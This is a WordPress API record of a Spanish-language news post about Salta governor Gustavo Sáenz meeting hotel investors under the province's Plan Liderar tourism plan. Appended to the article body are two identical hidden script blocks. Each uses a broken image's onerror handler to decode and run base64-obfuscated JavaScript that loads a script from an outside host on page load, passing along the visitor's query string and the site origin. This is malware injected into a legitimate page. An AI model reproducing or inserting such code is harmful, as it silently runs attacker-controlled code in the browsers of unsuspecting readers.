{"id":1380,"date":"2022-08-28T12:38:53","date_gmt":"2022-08-28T15:38:53","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1380"},"modified":"2025-08-14T00:37:15","modified_gmt":"2025-08-14T03:37:15","slug":"la-politica-turistica-de-saenz-puso-a-salta-en-la-mira-de-inversiones-nacionales-y-extranjeras","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1380","title":{"rendered":"La pol\u00edtica tur\u00edstica de S\u00e1enz puso a Salta en la mira de inversiones nacionales y extranjeras"},"content":{"rendered":"\n<h4 class=\"has-cyan-bluish-gray-color has-text-color has-background wp-block-heading\" style=\"background-color:#be0b38\"><em>El rol de Salta en la industria tur\u00edstica y las proyecciones de crecimiento de la mano del Plan Liderar, despiertan el inter\u00e9s de inversores \u201cSeguimos trabajando para lograr la llegada de inversiones privadas que permitan el desarrollo y el progreso de nuestra provincia\u201d, se\u00f1al\u00f3 el Gobernador.<\/em><\/h4>\n\n\n\n<p>El gobernador&nbsp;<strong>Gustavo Sa\u00e9nz&nbsp;<\/strong>recibi\u00f3 al presidente en Argentina de la cadena hotelera Howard Johnson,&nbsp;<strong>&nbsp;Alberto Albamonte<\/strong>&nbsp;y al inversor espa\u00f1ol&nbsp;<strong>Fabrizio Pastor<\/strong>&nbsp;quienes dieron a conocer una propuesta para invertir en Salta, espec\u00edficamente en infraestructura tur\u00edstica.&nbsp;<\/p>\n\n\n\n<p>\u201cSeguimos trabajando para lograr la llegada de inversiones privadas que permitan el desarrollo y el progreso de nuestra provincia\u201d, indic\u00f3 el mandatario con relaci\u00f3n al Plan Liderar que el Gobierno a trav\u00e9s del Ministerio de Turismo y Deportes, elabor\u00f3 para trabajar hasta 2027 en pol\u00edticas de formaci\u00f3n de recursos, desarrollo y promoci\u00f3n tur\u00edstica.<\/p>\n\n\n\n<p>Participaron el ministro de Turismo y Deportes&nbsp;<strong>Mario Pe\u00f1a<\/strong>&nbsp;y el presidente de la Uni\u00f3n de Trabajadores del Turismo, Hoteleros y Gastron\u00f3micos,&nbsp;<strong>Luis Barrionuevo<\/strong>, quienes &nbsp;coincidieron en la importancia de generar las condiciones necesarias para que prosperen proyectos que contribuyan a generar empleos genuinos, al tiempo de motorizar &nbsp;el aparato productivo local.<br>&nbsp;<br>La estrategia del Plan Liderar ser\u00e1 acompa\u00f1ada de un proceso de inversi\u00f3n p\u00fablica para que a\u00f1o a a\u00f1o se crezca en la cantidad de turistas y en eso es clave la inversi\u00f3n privada ya que habr\u00e1 un incremento en la demanda de servicios ligados a la industria.<\/p>\n\n\n\n<p>El gobernador Sa\u00e9nz comparti\u00f3 con los inversores una visi\u00f3n general sobre la provincia destacando la seguridad jur\u00eddica existente y c\u00f3mo el turismo significa una pol\u00edtica de estado. Junto al crecimiento, son aspectos &nbsp;claves en inversiones a largo plazo donde la asociaci\u00f3n con el sector privado es continua.<br>&nbsp;<br>El ministro Pe\u00f1a por su parte indic\u00f3 que \u201cla infraestructura hotelera debe crecer en los pr\u00f3ximos a\u00f1os para absorber la demanda que crecer\u00e1 a partir de lograr los objetivos planteados en el Plan Liderar de superar en 2027, los 3 millones de turistas que se enamoraran de Salta\u00bb.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/la-politica-turistica-de-saenz-puso-a-salta-en-la-mira-de-inversiones-nacionales-y-extranjeras-84540\" target=\"_blank\" rel=\"noreferrer noopener\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n\n\n\n<p><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El rol de Salta en la industria tur\u00edstica y las proyecciones de crecimiento de la mano del Plan Liderar, despiertan el inter\u00e9s de inversores \u201cSeguimos trabajando para lograr la llegada de inversiones privadas que permitan el desarrollo y el progreso de nuestra provincia\u201d, se\u00f1al\u00f3 el Gobernador. El gobernador&nbsp;Gustavo Sa\u00e9nz&nbsp;recibi\u00f3 al presidente en Argentina de la [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1381,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14],"tags":[],"class_list":{"0":"post-1380","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1380"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1380"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1380\/revisions"}],"predecessor-version":[{"id":7376,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1380\/revisions\/7376"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1381"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1380"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1380"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1380"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}